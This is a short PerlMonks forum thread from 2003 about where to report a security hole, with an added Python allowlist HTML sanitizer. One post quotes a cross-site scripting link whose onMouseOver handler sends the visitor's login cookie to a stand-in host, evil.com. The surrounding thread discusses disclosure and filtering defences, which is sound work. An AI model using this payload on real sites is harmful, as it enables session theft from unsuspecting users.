I've discovered a security hole in the current Perl Monks website.

 Now - where do I report this?

 I know the code behind the site is derived from that on Everything, so I'm reasonably sure that it would apply to their site also. (But without having an account there, it's hard to verify.)

 Clearly I do not wish to post details out in the public - so I'm asking this question here.

 You can contact me in many ways - even using my GPG Key if you wish.

 Interesting problem: I wish to report the issue to somebody with power to fix it (quickly) and can verify who I am. How do I trust the person who contacts me is who they say they are ..? ;)

Steve
---
steve.org.uk

Re: Where to report a security hole?
by data64 (Chaplain) on Mar 14, 2003 at 22:23 UTC

    If it is urgent, you could msg the gods.


    Just a tongue-tied, twisted, earth-bound misfit. -- Pink Floyd

       Thanks - It turns out this was a known issue which had been discussed before.

       I was referring to malicious links being able to steal your login cookie via a link of the following form:

      <a href="http://www.some.com/"
        onMouseOver="document.location='http://evil.com/steal.cgi?id=' +
         document.cookie;">Link Text</a>
      

       For example

       This only works upon personal node apparently, so it's not considered a problem.

       Update: I guess the general solution to this problem from a CGI filtering point of view is to remove all attributes from HTML tags which aren't explicitly allowed.

       Failing that you could filter out the 'obvious' dangerous ones - but you'd probably miss quite a few.

      Steve
      ---
      steve.org.uk
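
The allowlist filtering described in the update above, as an added example in Python that is not part of the original thread or of the site's own code. The tag and attribute policy and the names (ALLOWED, safe_url, sanitize) are assumptions, and the example goes one step beyond the post by also checking the URL scheme of an allowed href.

```python
import re
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Assumed policy for this example: tag -> attributes explicitly allowed on it.
ALLOWED = {"a": {"href", "title"}, "b": set(), "i": set(), "p": set(), "br": set()}
SAFE_SCHEMES = {"", "http", "https", "mailto"}  # "" means a relative link
VOID = {"br"}                                   # tags that take no closing tag

def safe_url(value):
    # Browsers ignore whitespace/control characters in a scheme, so strip them first.
    try:
        return urlsplit(re.sub(r"[\x00-\x20]+", "", value)).scheme.lower() in SAFE_SCHEMES
    except ValueError:
        return False

class AllowlistFilter(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []

    def handle_starttag(self, tag, attrs):
        # The parser lowercases names, so onMouseOver arrives as onmouseover.
        if tag not in ALLOWED:
            return  # unknown tag dropped; its text content is still emitted, escaped
        kept = ""
        for name, value in attrs:
            ok = name in ALLOWED[tag] and value is not None
            if ok and (name != "href" or safe_url(value)):
                kept += f' {name}="{escape(value, quote=True)}"'
        self.out.append(f"<{tag}{kept}>")

    def handle_endtag(self, tag):
        if tag in ALLOWED and tag not in VOID:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(escape(data, quote=False))  # text is always re-escaped

def sanitize(markup):
    f = AllowlistFilter()
    f.feed(markup)
    f.close()
    return "".join(f.out)

# Constructed sample: the link form quoted in the post above.
SAMPLE = ('<a href="http://www.some.com/"\n onMouseOver="document.location='
          "'http://evil.com/steal.cgi?id=' + document.cookie;\">Link Text</a>")
```

Because the output is rebuilt from the parsed tokens rather than edited in place, an attribute the policy does not name never reaches the page, whatever its spelling or case.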

        I'm not a web guy, but my understanding is that this is why so many monks have JavaScript disabled for this site. You might visit Petruchio's node if you wish to see a friendly warning of this sort of attack.


        "The dead do not recognize context" -- Kai, Lexx